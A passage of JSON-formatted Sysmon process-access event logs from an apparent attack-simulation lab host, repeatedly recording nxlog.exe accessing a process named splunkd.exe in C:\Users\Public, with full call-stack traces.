(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:34.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:35.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:35.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:36.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:36.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:37.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:37.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:38.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:38.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:39.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:39.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:40.552\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:40.552","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
